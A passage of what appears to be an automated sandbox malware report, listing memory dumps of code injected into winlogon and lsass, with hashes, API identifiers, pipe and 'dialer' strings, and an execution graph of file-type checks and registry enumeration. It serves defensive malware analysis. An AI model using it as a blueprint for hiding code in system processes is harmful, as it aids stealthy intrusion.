                                            • Instruction ID: e84ec4e56ed1e90a05ef63eae199e49c7ac373d922cc0b8786abc0fb272ba263
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: 9871043A21CFA165EB25DFEE98483AE7791F749B86F648066DE4B43B89DE34C504C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: d12b274edd156fd082638bfaa4ca778a18f09c4e7acfd800022e022de31a8ae9
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: DF71063A284FA1A1E729DFAE99483EAA391F744B86F648026DD4D83B89DF34C504C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: 82a189bbe50c5a58e74aff3149cadbbba18f33c2f75b78c150759b162fa20576
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: E051FC3A20CFA163EA769FEE955C36A7751F385B81F208165DD8B43B9ACE35C441CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: cc81301975acbc3bdc9d2eb18399531ce39cc04ac7486b31e5b3b3d3a3b0ffd4
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: B551203A289FA163EA35DFAD915C3AE6751F385B81F20D025CD8D83BAACE35D401CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: dbd3c59a83022a55f629b447afb55701cd426435ed0c6f26eff50a32d3407be4
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: 0241D776324F90A5EB20DF69E44839AB7A0F398B85F508025EE8E87798DF3CC541CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: 6b276c1d234bb8f25c6064979ad644cd6b82844d934e07ca1d1a57b464edc023
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: 8841E976314E50A1EB20DF69E44839ABBA1F7987C6F508025EE4D87798EF3CC541CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: 96e3d65a4d9add6818bea14478ca5d8bc85ea27d49f2560d141d73b6693779a1
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: EE111A3A608BD096D760CB5AF48429AB7A4F7C9B90F548126EE8E83B59DF38C450CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: cb534144ff171c414bc7ef4ddf8f009e4a3f6790c9b4bf86c512c87e9ed65ee8
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: A9111A3A608BD096DB64CB5AF48429AB7A5F7C9B91F548126EE8D83B59DF38C450CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: 354041a0a2ecc4c9e9bc09221ca2bb7f4da21dcaa4cc32c5419b9af12a7b4355
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: 1D114C36218F9092EB658F19F44425977A4F788F99F288260DF8D07B68DF38C552CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: 4b92308cc5971c97455cfe5810083c2969dc8172d77cd0f3ca93aac080620cdf
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: 6B111C36218F9092EB618F59E44425A77A5FB88B99F288221DF8D47B68DF38C556CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 753a0c4c8e75c7b377fb19d25a41dc167e0867bab3c2666fc635be3435da41e9
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: C8F02729728FB0B1E7059BC9F4082A53360EB88F82F68C161EA4A03B14CF38C894CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 15065ee6f9c7cdb5ee65a80d5012db01730a101526d0ffad1630422f33bff185
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 7DF0A729314FB0B1EB059BCDF4486A56372EB88F93F59D025EA5903B65CF38C995CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: ad5d257609b9ae283b254a7c1adf856348e354321dbb8be3287acd0e2c9a4b05
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: 18E09229306E51B2EE059BDDF44C2F8B321DB94747FAAD021991A06256CE38C986D340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: 95b1334a58423dabd032f5bac3f661d812c70f46580b33679b560d0baad2b08e
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: 03E09229300D51B2FE05DBDDF4582F42321DF88B42F69D421A559066D2CE38C886D341
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: 7188367852273573d0506cae3145d3ebffeb3ec7035bda74b2e084343ebc6817
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: DCE09269628E50B1EB054BDCF80C6A93362FB88F82F68C162DA0A06355CE38C855C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: e7db87f7a35c98745af35ace1be3c6e53bac379613e017ee2811a5807a647cc3
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: C4E09269304E50B1EB088BDCF80C6A56363FBC8B83F58D022DA1906365CE38C855C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: 033f51fa4fbd303eb701596ecc85ecdd0deee511843dda6ace5587389423011c
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: C021A77A618FA091EB218FADE40825AF7A0FB88F95F158120DE8D47B24EF78C543C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: 7f3c580e7f6acc78a1b324a506cbe828dcca390cb46b98e836b6ffd308063445
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: 6B21952A704FA0D1EB11CF9DE40825AF3A5FB84B96F158124DE8C87B24EF78C542C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: e260d4879ccdd16d2670f1e3a98160fb33c08bdd2834f05f7ee2a4984eaa195b
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 07E09AB5A21A10D6E7288FBAD80834A36E1FB8CF02F58C434C90907360DF7D84DACB80
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: bd58b1467632bf9a15e0b0447b9297be9f2b07fc24b7c5a056ce1b31617e21fe
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: C2E0E5B5B11A10D6E7089FAAD81835A76EAFB88F53F49C024C94D07360DF7D949ACB90

                                            Execution Graph

                                            Execution Coverage:1.1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:124
                                            Total number of Limit Nodes:13
                                            execution_graph 14011 202c0ae26f0 14012 202c0ae276f 14011->14012 14013 202c0ae27d1 GetFileType 14012->14013 14025 202c0ae2961 14012->14025 14014 202c0ae27df StrCpyW 14013->14014 14015 202c0ae27f5 14013->14015 14016 202c0ae2804 14014->14016 14027 202c0ae1ab8 GetFinalPathNameByHandleW 14015->14027 14020 202c0ae280e 14016->14020 14023 202c0ae28b3 14016->14023 14019 202c0ae3930 StrCmpNIW 14019->14023 14020->14025 14032 202c0ae3930 14020->14032 14035 202c0ae3200 StrCmpIW 14020->14035 14039 202c0ae1e4c 14020->14039 14023->14019 14024 202c0ae3200 4 API calls 14023->14024 14023->14025 14026 202c0ae1e4c 2 API calls 14023->14026 14024->14023 14026->14023 14028 202c0ae1b21 14027->14028 14029 202c0ae1ae2 StrCmpNIW 14027->14029 14028->14016 14029->14028 14030 202c0ae1afc lstrlenW 14029->14030 14030->14028 14031 202c0ae1b0e StrCpyW 14030->14031 14031->14028 14033 202c0ae393d StrCmpNIW 14032->14033 14034 202c0ae3952 14032->14034 14033->14034 14034->14020 14036 202c0ae3249 PathCombineW 14035->14036 14037 202c0ae3232 StrCpyW StrCatW 14035->14037 14038 202c0ae3252 14036->14038 14037->14038 14038->14020 14040 202c0ae1e63 14039->14040 14042 202c0ae1e6c 14039->14042 14043 202c0ae1554 14040->14043 14042->14020 14044 202c0ae15a4 14043->14044 14047 202c0ae156e 14043->14047 14044->14042 14045 202c0ae158d StrCmpW 14045->14047 14046 202c0ae1585 StrCmpIW 14046->14047 14047->14044 14047->14045 14047->14046 14048 202c0ae21cc 14049 202c0ae21fd 14048->14049 14050 202c0ae22e8 14049->14050 14051 202c0ae231d 14049->14051 14057 202c0ae2221 14049->14057 14052 202c0ae2391 14051->14052 14053 202c0ae2322 14051->14053 14052->14050 14056 202c0ae30b4 9 API calls 14052->14056 14066 202c0ae30b4 GetProcessHeap 14053->14066 14055 202c0ae2263 StrCmpNIW 14055->14057 14056->14050 14057->14050 14057->14055 14059 202c0ae1d60 14057->14059 14060 202c0ae1d8f GetProcessHeap 14059->14060 14061 202c0ae1e36 14059->14061 14063 202c0ae1db0 _invalid_parameter_noinfo 14060->14063 14061->14057 14062 202c0ae1e18 GetProcessHeap HeapFree 14062->14061 14063->14061 14063->14062 14064 202c0ae1554 2 API calls 14063->14064 14064->14062 14071 202c0ae30f0 _invalid_parameter_noinfo 14066->14071 14067 202c0ae31d1 GetProcessHeap HeapFree 14067->14050 14068 202c0ae31cc 14068->14067 14069 202c0ae315e StrCmpNIW 14069->14071 14070 202c0ae1d60 5 API calls 14070->14071 14071->14067 14071->14068 14071->14069 14071->14070 14072 202c0ae1c28 14077 202c0ae1650 GetProcessHeap 14072->14077 14074 202c0ae1c3e Sleep SleepEx 14076 202c0ae1c37 14074->14076 14075 202c0ae15c0 StrCmpIW StrCmpW 14075->14076 14076->14074 14076->14075 14078 202c0ae1670 _invalid_parameter_noinfo 14077->14078 14122 202c0ae1274 GetProcessHeap 14078->14122 14080 202c0ae1678 14081 202c0ae1274 2 API calls 14080->14081 14082 202c0ae1689 14081->14082 14083 202c0ae1274 2 API calls 14082->14083 14084 202c0ae1692 14083->14084 14085 202c0ae1274 2 API calls 14084->14085 14086 202c0ae169b 14085->14086 14087 202c0ae16b6 RegOpenKeyExW 14086->14087 14088 202c0ae18ce 14087->14088 14089 202c0ae16e8 RegOpenKeyExW 14087->14089 14088->14076 14090 202c0ae1711 14089->14090 14091 202c0ae1727 RegOpenKeyExW 14089->14091 14133 202c0ae12c8 RegQueryInfoKeyW 14090->14133 14093 202c0ae174b 14091->14093 14094 202c0ae1762 RegOpenKeyExW 14091->14094 14126 202c0ae104c RegQueryInfoKeyW 14093->14126 14097 202c0ae179d RegOpenKeyExW 14094->14097 14098 202c0ae1786 14094->14098 14099 202c0ae17c1 14097->14099 14100 202c0ae17d8 RegOpenKeyExW 14097->14100 14102 202c0ae12c8 13 API calls 14098->14102 14103 202c0ae12c8 13 API calls 14099->14103 14104 202c0ae17fc 14100->14104 14105 202c0ae1813 RegOpenKeyExW 14100->14105 14106 202c0ae1793 RegCloseKey 14102->14106 14107 202c0ae17ce RegCloseKey 14103->14107 14108 202c0ae12c8 13 API calls 14104->14108 14109 202c0ae184e RegOpenKeyExW 14105->14109 14110 202c0ae1837 14105->14110 14106->14097 14107->14100 14111 202c0ae1809 RegCloseKey 14108->14111 14113 202c0ae1889 RegOpenKeyExW 14109->14113 14114 202c0ae1872 14109->14114 14112 202c0ae104c 5 API calls 14110->14112 14111->14105 14117 202c0ae1844 RegCloseKey 14112->14117 14115 202c0ae18ad 14113->14115 14116 202c0ae18c4 RegCloseKey 14113->14116 14118 202c0ae104c 5 API calls 14114->14118 14119 202c0ae104c 5 API calls 14115->14119 14116->14088 14117->14109 14120 202c0ae187f RegCloseKey 14118->14120 14121 202c0ae18ba RegCloseKey 14119->14121 14120->14113 14121->14116 14144 202c0af3170 14122->14144 14124 202c0ae128f GetProcessHeap 14125 202c0ae12ba _invalid_parameter_noinfo 14124->14125 14125->14080 14127 202c0ae10b9 14126->14127 14128 202c0ae11b5 RegCloseKey 14126->14128 14127->14128 14129 202c0ae10c7 RegEnumValueW 14127->14129 14128->14094 14131 202c0ae111c _invalid_parameter_noinfo 14129->14131 14130 202c0ae1149 GetProcessHeap 14130->14131 14131->14128 14131->14129 14131->14130 14132 202c0ae117f GetProcessHeap HeapFree 14131->14132 14132->14131 14134 202c0ae1499 RegCloseKey 14133->14134 14135 202c0ae1334 GetProcessHeap 14133->14135 14134->14091 14141 202c0ae134b _invalid_parameter_noinfo 14135->14141 14136 202c0ae135d RegEnumValueW 14136->14141 14137 202c0ae1485 GetProcessHeap HeapFree 14137->14134 14138 202c0ae1554 2 API calls 14138->14141 14139 202c0ae142f lstrlenW GetProcessHeap 14139->14141 14140 202c0ae13dd GetProcessHeap 14140->14141 14141->14136 14141->14137 14141->14138 14141->14139 14141->14140 14142 202c0ae1454 StrCpyW 14141->14142 14143 202c0ae1413 GetProcessHeap HeapFree 14141->14143 14142->14141 14143->14139 14145 202c0af317b 14144->14145 14146 202c0ab2908 14148 202c0ab2936 14146->14148 14147 202c0ab2a2b LoadLibraryA 14147->14148 14148->14147 14149 202c0ab2aa7 14148->14149

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 58 202c0ae26f0-202c0ae2774 call 202c0afeca0 61 202c0ae298f-202c0ae29b2 58->61 62 202c0ae277a-202c0ae277d 58->62 62->61 63 202c0ae2783-202c0ae2791 62->63 63->61 64 202c0ae2797-202c0ae27dd call 202c0ae8d50 * 3 GetFileType 63->64 71 202c0ae27df-202c0ae27f3 StrCpyW 64->71 72 202c0ae27f5-202c0ae27ff call 202c0ae1ab8 64->72 73 202c0ae2804-202c0ae2808 71->73 72->73 75 202c0ae280e-202c0ae2827 call 202c0ae3264 call 202c0ae3930 73->75 76 202c0ae28b3-202c0ae28b9 73->76 89 202c0ae285e-202c0ae28a8 call 202c0afeca0 75->89 90 202c0ae2829-202c0ae2858 call 202c0ae3264 call 202c0ae3200 call 202c0ae1e4c 75->90 78 202c0ae28bc-202c0ae28c1 76->78 80 202c0ae28df 78->80 81 202c0ae28c3-202c0ae28c6 78->81 82 202c0ae28e1-202c0ae28fa call 202c0ae3264 call 202c0ae3930 80->82 81->80 84 202c0ae28c8-202c0ae28cb 81->84 100 202c0ae28fc-202c0ae292b call 202c0ae3264 call 202c0ae3200 call 202c0ae1e4c 82->100 101 202c0ae293b-202c0ae293d 82->101 84->80 87 202c0ae28cd-202c0ae28d0 84->87 87->80 91 202c0ae28d2-202c0ae28d5 87->91 89->61 102 202c0ae28ae 89->102 90->61 90->89 91->80 93 202c0ae28d7-202c0ae28dd 91->93 93->80 93->82 100->101 124 202c0ae292d-202c0ae2937 100->124 103 202c0ae2961-202c0ae2964 101->103 104 202c0ae293f-202c0ae295c call 202c0ae86a0 101->104 102->75 109 202c0ae296e-202c0ae2971 103->109 110 202c0ae2966-202c0ae296c 103->110 104->78 114 202c0ae298c 109->114 115 202c0ae2973-202c0ae2976 109->115 110->61 114->61 115->114 117 202c0ae2978-202c0ae297b 115->117 117->114 119 202c0ae297d-202c0ae2980 117->119 119->114 121 202c0ae2982-202c0ae2985 119->121 121->114 123 202c0ae2987-202c0ae298a 121->123 123->61 123->114 124->61 125 202c0ae2939 124->125 125->78
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: 69e20323056a9615f1253612b4b675ef762144682d8232d5f9ea75a0753cbd44
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: BE71AE322047C1C6FB289B2699DC3AEA795F754B84F461017DFA947B8BDE35CA288700

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 126 202c0ae21cc-202c0ae21f7 call 202c0afece0 128 202c0ae21fd-202c0ae2206 126->128 129 202c0ae220f-202c0ae2212 128->129 130 202c0ae2208-202c0ae220c 128->130 131 202c0ae23cd-202c0ae23ed 129->131 132 202c0ae2218-202c0ae221b 129->132 130->129 133 202c0ae2221-202c0ae2233 132->133 134 202c0ae231d-202c0ae2320 132->134 133->131 137 202c0ae2239-202c0ae224f 133->137 135 202c0ae2391-202c0ae2394 134->135 136 202c0ae2322-202c0ae233c call 202c0ae30b4 134->136 135->131 138 202c0ae2396-202c0ae23a9 call 202c0ae30b4 135->138 136->131 149 202c0ae2342-202c0ae2358 136->149 140 202c0ae2251-202c0ae2261 137->140 141 202c0ae227d-202c0ae2288 call 202c0ae1d28 137->141 138->131 150 202c0ae23ab-202c0ae23b3 138->150 140->141 142 202c0ae2263-202c0ae227b StrCmpNIW 140->142 146 202c0ae22a9-202c0ae22bb 141->146 151 202c0ae228a-202c0ae22a2 call 202c0ae1d60 141->151 142->141 142->146 152 202c0ae22bd-202c0ae22bf 146->152 153 202c0ae22cb-202c0ae22cd 146->153 149->131 154 202c0ae235a-202c0ae2376 149->154 150->131 155 202c0ae23b5-202c0ae23bd 150->155 151->146 168 202c0ae22a4-202c0ae22a7 151->168 157 202c0ae22c1-202c0ae22c4 152->157 158 202c0ae22c6-202c0ae22c9 152->158 159 202c0ae22cf-202c0ae22d2 153->159 160 202c0ae22d4 153->160 161 202c0ae237a-202c0ae238d 154->161 162 202c0ae23c0-202c0ae23cb 155->162 164 202c0ae22d7-202c0ae22da 157->164 158->164 159->164 160->164 161->161 165 202c0ae238f 161->165 162->131 162->162 166 202c0ae22dc-202c0ae22e2 164->166 167 202c0ae22e8-202c0ae22eb 164->167 165->131 166->137 166->167 167->131 169 202c0ae22f1-202c0ae22f5 167->169 168->164 170 202c0ae230c-202c0ae2318 169->170 171 202c0ae22f7-202c0ae22fa 169->171 170->131 171->131 172 202c0ae2300-202c0ae2305 171->172 172->169 173 202c0ae2307 172->173 173->131
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3013316756.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_202c0ae0000_lsass.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: S$dialer
                                            • API String ID: 756756679-3873981283
                                            • Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                            • Instruction ID: 25fb4c50494745b03f6fbfcc80ee10dbaa90343c0eba2f6fdf05f69e3cf436e3
                                            • Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
